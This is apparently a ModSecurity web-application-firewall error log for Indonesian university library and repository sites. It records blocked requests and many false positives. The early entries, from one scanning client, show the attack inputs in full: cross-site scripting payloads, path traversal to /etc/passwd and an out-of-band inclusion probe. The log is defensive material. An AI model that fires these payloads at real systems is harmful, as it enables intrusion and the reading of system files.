[Tue Aug 29 11:57:11.533159 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAqqtrgAAAAA"]
[Tue Aug 29 11:57:11.955642 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@gEAAAAK"]
[Tue Aug 29 11:57:18.576037 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0hiokid1xubj7u.oast.site found within TX:1: cjmnijtjmimvgniikdb0hiokid1xubj7u.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAnEqcEAAAAO"]
[Tue Aug 29 11:57:18.598777 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArdQg0AAAAI"]
[Tue Aug 29 11:57:19.579231 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAArePHUAAAAJ"]
[Tue Aug 29 11:57:23.542985 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAoz8ewAAAAS"]
[Tue Aug 29 11:57:25.847755 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tcCo-f0AAArLLjAAAAAb"]
[Tue Aug 29 11:57:26.099125 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAocyr0AAAAR"]
[Tue Aug 29 11:57:27.565105 2023] [:error] [pid 2784] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArgDxEAAAAE"]
[Tue Aug 29 11:57:30.531776 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAAoz8hQAAAAS"]
[Tue Aug 29 11:57:30.593186 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hcAAAAS"]
[Tue Aug 29 11:57:30.708372 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAq@sqgAAAAM"]
[Tue Aug 29 11:57:31.659191 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAocyuIAAAAR"]
[Tue Aug 29 11:57:33.552510 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vcCo-f0AAArLLl4AAAAb"]
[Tue Aug 29 11:57:33.552569 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArePN4AAAAJ"]
[Tue Aug 29 13:08:08.198139 2023] [:error] [pid 4243] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCHyaDd_a9e1kH3FFvgtn8YNsvwKyz8NM6l8lzmM7yhEZgZPJFCSxwmMhSbqPYUf4FI-biN1tNterb-ysBK9PC08AkgdGm_3Or4KxW5j1xaJ53vGz5fSZd7Fqj5DI0KpfjR6syPBXp7h7vMir0ElsnulgzLSS_RlLvx40AdCCFMp5g9SgXDRng4WtEbSfYqIcKnhkzXkzg9BoVG62r2qo7T6SlccQDNKylUvQ8NS2AXKhFED7NRd5oZ4HJzD4tZsOYT0tOlFy8zMOv99sbHImNpzUKXIp6Sct1oIpoS6Q_0bOO2_slS7OrS4DTzeJwv7StkgI_y5zQXdSpdBM84G6oay2JZopHmEzU_EHvhOy1-J-59IN_ofcusoZ3qDp6PvIpjEQq37XXhsZzzYa6LRLhdAWgW0Jq9-bzeIijHHukRjojs3Q0Hw2rJPzd7wgG..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO2LSMCo-f0AABCTsP4AAAAG"]
[Tue Aug 29 13:08:27.529259 2023] [:error] [pid 4246] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwBrqDAux5DqedgkTgYuN3mlsdHYYawvgFQTD0wLHVI4FjVwpv5MY7TTj7U2HEWfntuo4q7YFB3HqJ79z7zMmj60rlnYIE2LP-rb64lsHyGzhTVOs_EG3DyL1qJ9-wqeMkDdat_XQchDNFwIqL2E_5O4jQAXDTIlWdh4Psry6P4IQE_ef4S2jNTwk2OQFfbUlaRKI5xBKCUGt-90Dtw0dnMGycAE43zq_ID9pr140QpRKLMVdFYJL-hn_BEFJt1CrYzYhXirofscRLg-cSMIfnZsyw4IdEza47D7Vaiemb3s_FoP42NEfcGnqmN3bJNf32EvomUqgtdUIsydNlH9Ki3q-1L_so8v-D2gVLGXiOGZ99tnUpjz-k5jHc4xVjxtcEQ41hiYWAIADTSgbq0A37no8OFujhYbca2w2FFe7HaL9XsKmtnIRAlytHMhCVs..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO2LW8Co-f0AABCWjLMAAAAN"]
[Tue Aug 29 15:01:52.491875 2023] [:error] [pid 6877] [client 74.234.37.185] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_11_dos_protection.conf"] [line "44"] [id "981049"] [msg "Potential Denial of Service (DoS) Attack from 74.234.37.185 - # of Request Bursts: 2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2l78Co-f0AABrdxpMAAAAV"]
[Mon Aug 28 08:14:05.763865 2023] [:error] [pid 38340] [client 47.128.21.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/cover_siska_septiani.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv03cCo-f0AAJXEm@gAAAAM"]
[Mon Aug 28 08:30:10.693721 2023] [:error] [pid 38462] [client 47.128.30.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_-_(RIZMA_SJ)-1_page-0001.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv4osCo-f0AAJY@OoEAAAAB"]
[Mon Aug 28 08:43:03.767993 2023] [:error] [pid 38303] [client 47.128.19.241] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/journalThumbnail_en_US.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv7p8Co-f0AAJWfaBwAAAAI"]
[Mon Aug 28 08:46:01.057741 2023] [:error] [pid 38386] [client 47.128.24.157] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_LINDA_INDRIYANI_GUNAWAN.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv8WcCo-f0AAJXyOlIAAAAM"]
[Mon Aug 28 08:51:34.203648 2023] [:error] [pid 38114] [client 114.122.104.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Ayu_Lestari-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOv9psCo-f0AAJTioi8AAAAE"]
[Mon Aug 28 08:51:39.288183 2023] [:error] [pid 38114] [client 114.122.104.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB II Ayu Lestari.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOv9q8Co-f0AAJTiojIAAAAE"]
[Mon Aug 28 09:03:47.064869 2023] [:error] [pid 38727] [client 47.128.16.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Neng_Cantika_Pebrianti_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwAg8Co-f0AAJdH0EkAAAAI"]
[Mon Aug 28 09:13:40.150527 2023] [:error] [pid 39237] [client 47.128.21.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Man-2019\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwC1MCo-f0AAJlFYc0AAAAU"]
[Mon Aug 28 09:39:55.712818 2023] [:error] [pid 39566] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Cindy_Rizqia_Nur_Utami.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwI@8Co-f0AAJqOC00AAAAJ"]
[Mon Aug 28 09:40:13.324560 2023] [:error] [pid 39577] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_SEKAR_ARUM_R_41152010190188-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwJDcCo-f0AAJqZqBgAAAAK"]
[Mon Aug 28 09:40:22.662732 2023] [:error] [pid 39669] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_SEKAR_ARUM_R_41152010190188-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwJFsCo-f0AAJr1ZocAAAAY"]
[Mon Aug 28 09:40:26.741317 2023] [:error] [pid 39580] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER,DAFTAR LAMPIRAN_SEKAR ARUM R_41152010190188-1-23.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOwJGsCo-f0AAJqckSsAAAAR"]
[Mon Aug 28 09:40:38.433118 2023] [:error] [pid 39580] [client 114.5.251.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Rangga_RAhmat_Alqodri.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOwJJsCo-f0AAJqckTIAAAAR"]
